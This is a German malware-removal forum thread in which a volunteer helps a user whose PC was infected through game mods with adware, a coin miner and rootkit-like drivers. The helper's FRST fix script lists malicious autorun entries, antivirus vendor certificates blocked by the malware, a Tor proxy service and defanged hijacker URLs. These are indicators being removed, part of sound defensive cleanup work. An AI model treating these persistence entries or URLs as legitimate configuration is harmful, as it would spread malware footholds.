Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   trojaner?/virus? (https://www.trojaner-board.de/190795-trojaner-virus.html)

moinbro 27.05.2018 11:19
trojaner?/virus?
 
Vorgeschichte:
Ich habe mir diverse mods für GTA SA heruntergeladen und dazu auch diverse mod installer und IMG editoren. Bei den Dateien die ich mir runtergeladen habe war wohl eine nicht so nette datei dabei, die immerwieder firefox oder internet explorer geöffnet hat und streaming seiten geöffnet hat.Im Taskmanager liefen Tasks, die nicht auf meinem Rechner verloren haben.
Ich bin soweit, dass ich einige Taskts beendet habe und die dazugehörigen Dateien gelöscht habe.Firefox und internet explorer laufen wieder einwandfrei und werden auch nicht einfach so geöffnet
:confused:( allerding habe ich 3 bis 4 tasks von firefox im tasksmanager, ebenso bei spotify. ist das normal?)

Momentanes Problem
.Jetzt hab ich nurnoch das Problem, dass mein CPU auf dauerauslastung läuft d.h dauerhaft 100% was nicht normal ist. selbst wenn ich games spiele bzw. gespielt habe wie zb pubg oder arma (welche in der Regel viel leistung brauchen) auf maximal 60-70% und jetzt habe ich eine 100 % auslastung nur auf dem desktop.

Ich bedanke mich schonmal recht herzlich im voraus für die Hilfe.
Ihr könnt euch auch im Teamspeak³ bei mir melden wenn ihr möchtet: monsterclaw.de (geht vermutlich schneller so)
Rechtschreib fehler sind beabsichtigt. :dankeschoen:

M-K-D-B 27.05.2018 20:19
:hallo:





Mein Name ist Matthias und ich werde dir bei der Bereinigung deines Computers helfen.



Um die Bereinigung möchlichst effektiv und schnell gestalten zu können, bitte ich um Beachtung der folgenden Hinweise:
  1. Falls wir Hinweise auf illegal erworbene Software finden, werden wir den Support unterbrechen bis jegliche Art von illegaler Software vom Rechner entfernt wurde.

  2. Lies dir meine Anleitungen immer sorgfältig durch, arbeite alle Schritte in der vorgegebenen Reihefolge nacheinander ab und poste immer alle Logdateien (auch wenn nichts gefunden wurde). Solltest du Probleme haben, stoppe mit deiner Bearbeitung und beschreibe mir dein Problem so gut es geht.

  3. Solltest du mir nicht innerhalb von 3 Tagen antworten, gehe ich davon aus, dass du keine Hilfe mehr benötigst. Dann lösche ich dein Thema aus meinem Abo. Solltest du einmal länger abwesend sein, so gib mir bitte Bescheid!

  4. Während der Bereinigung bitte nichts installieren oder deinstallieren, außer ich bitte dich darum!
    Außerdem bitte ich dich, nicht eigenmächtig irgendwelche Sicherheitsprogramme auszuführen und damit deinen Rechner zu überprüfen/bereinigen, da ich so leicht den Überblick verlieren kann.
    Zudem hättest du dir das Eröffnen eines Themas in diesem Fall auch gleich sparen können, wenn du dann doch wieder alleine rumhantierst.

  5. Bitte beachten: Download bei filepony.de: So ladet Ihr unsere Tools richtig!

  6. Alle zu verwendenen Programme sind auf dem Desktop ( C:\users\dein Benutzername\Desktop\ ) abzuspeichern und von dort als Administrator zu starten!

  7. Einige Programme, die wir hier verwenden, können unter Umständen von deinem Antiviren- oder Anti-Malwareprogramm fälschlicherweise als Bedrohung eingestuft werden. Die Sicherheitsprogramme können aufgrund eines bestimmten Programmverhaltens nicht zwischen "gut" oder "böse" unterscheiden und schlagen Alarm. Dabei handelt es sich um Fehlalarme, welche du getrost ignorieren kannst. Gegebenenfalls musst du deine Sicherheitssoftware vor der Ausführung eines Programms deaktivieren, damit unsere Bereinigungsvorgänge nicht beeinträchtigt werden.

  8. Sollten die Logdateien einmal die zulässige Länge (~ 120.000 Zeichen) überschreiten, so teile die Logdateien auf mehrere Posts auf.
    Zur Not kannst du die Logdateien dann auch zippen (in ein .zip Archiv packen) und als Anhang hochladen.

  9. Bitte arbeite so lange mit mir zusammen, bis ich dir sage, dass wir fertig sind und dein Rechner "sauber" ist. Das vorzeitige Verschwinden von Symptomen heißt nicht automatisch, dass dein Rechner bereits vollständig sauber ist.
    Du musst die hier verwendeten Programme NICHT selbst von deinem Computer entfernen. Das erledigt das TBCleanUpTool am Ende automatisch für dich.

  10. In der Regel antworte ich dir innerhalb von 24 Stunden, oft sogar wesentlich schneller.
    Jedoch habe auch ich einen normalen Beruf und Familie. Ich bin daher nicht jeden Tag stundenlag hier im Forum unterwegs. Es kann unter Umständen bis zu 2 Tage dauern, bis du eine Antwort von mir erhältst. Sollte diese Zeit überschritten sein, so kannst du mir gerne eine PM als Erinnerung schicken.





Bitte arbeite alle Schritte in der vorgegebenen Reihefolge nacheinander ab und poste alle Logdateien in CODE-Tags:
So funktioniert es:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert deinem Helfer massiv die Arbeit, es sei denn natürlich die Datei wäre ansonsten zu groß für das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
  • Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
  • Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
  • Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
  • Klicke aauf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.
http://www.trojaner-board.de/picture...&pictureid=307

Danke für deine Mitarbeit!







Schritt 1
Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop: FRST Download FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
  • Starte jetzt FRST.
  • Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
  • Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
  • Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)








Bitte poste mit deiner nächsten Antwort
  • die beiden neuen Logdateien von FRST (FRST.txt und Addition.txt).

moinbro 28.05.2018 15:32
Die logs sind zu lange, selbst 1 Log ist zu lange. wie kann ich die posten?

Ich habe mal was gelesen, dass wenn die logs zu lange sind man sie in eine Zip oder rar datei machen soll. da bräuchte ich hilfe, da ich nicht weiß wie ich das mache danke im voraus.

M-K-D-B 28.05.2018 20:09
Zitat:
Zitat von moinbro (Beitrag 1693331)
Ich habe mal was gelesen, dass wenn die logs zu lange sind man sie in eine Zip oder rar datei machen soll. da bräuchte ich hilfe, da ich nicht weiß wie ich das mache danke im voraus.
Rechtsklicke auf die FRST.txt bzw. Addition.txt
Wähle Senden an > Zip komprimierter Ordner

Die Archive kannst du dann als Anhang mit deiner nächsten Antwort hochladen.

moinbro 30.05.2018 08:51
Vielen Dank :D

Was mir noch eingefallen ist in meinen ersten Post zu schreiben, ich habe mich bisschen erkundigt im Internet und im Task manager habe ich auf jeden fall den Xmrig.exe trojaner(?) die symptome sind gleich wie im Internet beschrieben bzw. sie waren gleich, denn ich habe meine pc jetzt ca 2 tage laufen lassen und jetzt ist der Task nichtmehr da. Der CPU läuft jetzt nichtmehr auf 100% sondern auf 75% (was auch zu viel ist für normal zustand). Mein Ram war auf 7.3 ( habe 8Ram (2x 4Ram)) jetzt ist mein Ram auf 4.3, was eigentlich normal ist für meinen Rechner. Ich traue der Sache aber irgendwie nicht, ich habe nichts gemacht und auf einmal ist der Task nichtmehr da. Ich wollte es nur mal erwähnen falls es hilft ;)

Die logs sind im Anhang

M-K-D-B 30.05.2018 15:17
Servus,



schlechte Nachrichten... :pfeiff: dein Rechner ist voll mit Malware infiziert.

Du bist sogar mit Adware infiziert, von der ich dachte, dass sie "tot" sei... naja, so kann man sich irren... :lach:

Daher bist du ab sofort mein Lieblingsuser! :D :D :applaus:

Wir starten gleich mit dem ersten Teil der Bereinigung. ;)





Schritt 1
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    Start::
    CloseProcesses:
    HKLM\...\Run: [resolve_run] => C:\Program Files (x86)\Common Files\new.bat [184 2018-05-25] ()
    C:\Program Files (x86)\Common Files\new.bat
    HKLM\...\Policies\Explorer\Run: [Chrome Update Helper] => C:\Users\Nico\AppData\Local\Temp\dx10r.exe
    HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ACHTUNG
    HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ACHTUNG
    HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ACHTUNG
    HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ACHTUNG
    HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ACHTUNG
    HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ACHTUNG
    HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ACHTUNG
    HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ACHTUNG
    HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ACHTUNG
    HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ACHTUNG
    HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ACHTUNG
    HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ACHTUNG
    HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ACHTUNG
    HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ACHTUNG
    HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ACHTUNG
    HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ACHTUNG
    HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ACHTUNG
    HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ACHTUNG
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [muV82mBJud.exe] => C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69\muV82mBJud.exe [394240 2018-05-27] ()
    C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PLRFCKFE44692QO] => "C:\Program Files\RDH9TH3UTU\RDH9TH3UT.exe"
    C:\Program Files\RDH9TH3UTU
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [2196509] => "C:\Users\Nico\AppData\Roaming\okdd3kogot1\xc1a5n52rpd.exe" /VERYSILENT
    C:\Users\Nico\AppData\Roaming\okdd3kogot1
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [A4UX3F695ZAIC7C] => "C:\Program Files (x86)\eu0vb4pykb5\7CSH7.exe"
    C:\Program Files (x86)\eu0vb4pykb5
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [flosdx] => rundll32.exe "C:\Users\Nico\AppData\Local\pfialx.dll",flosdx <==== ACHTUNG
    C:\Users\Nico\AppData\Local\pfialx.dll
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [KDY06ILDW1UEHVJ] => "C:\Program Files\I88TDHYW3R\I88TDHYW3.exe"
    C:\Program Files\I88TDHYW3R
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PatientSunset] => C:\Windows\rss\csrss.exe [3188736 2018-05-27] () <==== ACHTUNG
    C:\Windows\rss\csrss.exe
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [QIJFFKRURZ.exe] => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\QIJFFKRURZ.exe
    C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [CloudNet] => C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-05-28] (EpicNet Inc.)
    C:\Users\Nico\AppData\Roaming\EpicNet Inc
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\MountPoints2: {21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} - E:\HiSuiteDownLoader.exe
    ShellExecuteHooks: Kein Name - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\System32\mcicda64.dll [2990080 2018-03-24] ()
    GroupPolicy: Beschränkung - Chrome <==== ACHTUNG
    CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.de/?gws_rd=ssl
    SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
    SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> DefaultScope {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
    FF HKLM\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
    C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}
    FF Extension: ( ) - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi [2018-05-27]
    FF HKLM-x32\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
    FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js [2018-05-27]
    R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2018-05-27] () [Datei ist nicht signiert] <==== ACHTUNG
    C:\ProgramData\Logic Cramble
    R2 MicroService; C:\Users\Nico\AppData\Local\XService\XService.dll [585216 2018-05-27] () [Datei ist nicht signiert]
    C:\Users\Nico\AppData\Local\XService
    S3 SystemUpdate64; C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [593920 2018-05-27] (SystemaRev) [Datei ist nicht signiert]
    C:\Program Files\SystemaRev
    R2 winamgr; C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe [10644480 2018-05-28] (Microsoft Corporation) [Datei ist nicht signiert] <==== ACHTUNG
    R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
    Unlock: C:\Windows\windefender.exe
    C:\Windows\windefender.exe
    R2 848d0b10145f615d9a5315f9c7921103; rundll32.exe C:\Windows\qcusolizqbhuglpw.qcus QEl [X]
    C:\Windows\qcusolizqbhuglpw.qcus
    S3 aspnet_state; %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [X]
    S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [X]
    S2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [X] <==== ACHTUNG
    C:\ProgramData\PrefsSecure
    S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [X] <==== ACHTUNG
    C:\Program Files (x86)\ProxyGate
    R2 TCPSvc; "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\Nico\AppData\Local\Temp\csrss\proxy\t" <==== ACHTUNG
    C:\Users\Nico\AppData\Local\Temp\csrss
    S2 WNetworkMgmt; "C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe"  [X]
    C:\ProgramData\Microsoft\Windows\WNetworkMgmt
    S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
    S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
    S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
    S3 VGPU; System32\drivers\rdvgkmd.sys [X]
    R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
    R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ACHTUNG (Null Byte Datei/Ordner)
    R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-27] () [Datei ist nicht signiert]
    C:\Windows\System32\drivers\WinmonProcessMonitor.sys
    C:\Windows\System32\drivers\WinmonFS.sys
    C:\Windows\System32\drivers\Winmon.sys
    2018-05-28 14:53 - 2018-05-28 14:53 - 000003824 _____ C:\Windows\System32\Tasks\MainPMgr
    2018-05-28 14:53 - 2018-05-28 14:53 - 000003786 _____ C:\Windows\System32\Tasks\SystemUpdate64
    2018-05-28 14:53 - 2018-05-28 14:53 - 000000000 ____D C:\Program Files\SystemaRev
    2018-05-28 14:38 - 2018-05-28 14:42 - 000189686 _____ C:\Windows\ntbtlog.txt
    2018-05-27 15:09 - 2018-05-27 15:09 - 000000000 ____D C:\ProgramData\SystemaRev
    2018-05-27 14:57 - 2018-05-27 14:57 - 000004270 _____ C:\Windows\System32\Tasks\ReimageUpdater
    2018-05-27 14:56 - 2018-05-28 14:40 - 000000150 _____ C:\Windows\Reimage.ini
    2018-05-27 14:50 - 2018-05-27 14:50 - 000000000 ____D C:\Users\Nico\AppData\Roaming\ParetoLogic
    2018-05-27 10:47 - 2018-05-27 11:15 - 000000000 ____D C:\Windows\SysWOW64\SSL
    2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ C:\Users\Nico\AppData\Local\sham.db
    2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ C:\Users\Nico\AppData\Local\agent.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
    2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ C:\Users\Nico\AppData\Local\Hottam.tst
    2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ C:\Users\Nico\AppData\Local\Jaytip.bin
    2018-05-27 10:47 - 2018-05-27 10:47 - 001620480 _____ C:\Windows\qcusolizqbhuglpw.qcus
    2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ C:\Users\Nico\AppData\Local\VoltFinlab.bin
    2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ C:\Users\Nico\AppData\Local\installer.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ C:\Users\Nico\AppData\Local\noah.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ C:\Users\Nico\AppData\Local\Config.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ C:\Users\Nico\AppData\Local\Main.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ C:\Users\Nico\AppData\Local\md.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 000000000 ____D C:\ProgramData\Logic Cramble
    2018-05-27 09:58 - 2018-05-27 09:58 - 000000306 __RSH C:\Users\Nico\ntuser.pol
    2018-05-27 09:58 - 2018-05-27 09:58 - 000000000 ____D C:\Users\Nico\AppData\Roaming\FastDataX
    2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\XService
    2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\Package Cache
    2018-05-27 09:49 - 2018-05-27 09:49 - 000000000 ____D C:\Users\Nico\AppData\Roaming\EpicNet Inc
    2018-05-27 09:48 - 2018-05-28 14:44 - 000003502 _____ C:\Windows\System32\Tasks\ScheduledUpdate
    2018-05-27 09:48 - 2018-05-28 14:44 - 000003172 _____ C:\Windows\System32\Tasks\csrss
    2018-05-27 09:48 - 2018-05-27 09:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
    2018-05-27 09:48 - 2018-05-27 09:48 - 000004180 _____ C:\Windows\System32\Tasks\AncillaryFunctionauf
    2018-05-27 09:48 - 2018-05-27 09:48 - 000000000 ____D C:\Users\Nico\AppData\Local\betterworld
    2018-05-27 09:48 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
    2018-05-27 09:47 - 2018-05-28 16:07 - 000003702 _____ C:\Windows\System32\Tasks\WindowsRecoveryCleaner
    2018-05-27 09:47 - 2018-05-28 14:44 - 000000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
    2018-05-27 09:47 - 2018-05-27 11:41 - 000003082 __RSH C:\ProgramData\ntuser.pol
    2018-05-27 09:47 - 2018-05-27 10:22 - 000016718 _____ C:\Windows\System32\Tasks\Social Software
    2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
    2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ C:\Users\Nico\AppData\Local\pfialx.dll
    2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT
    2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG
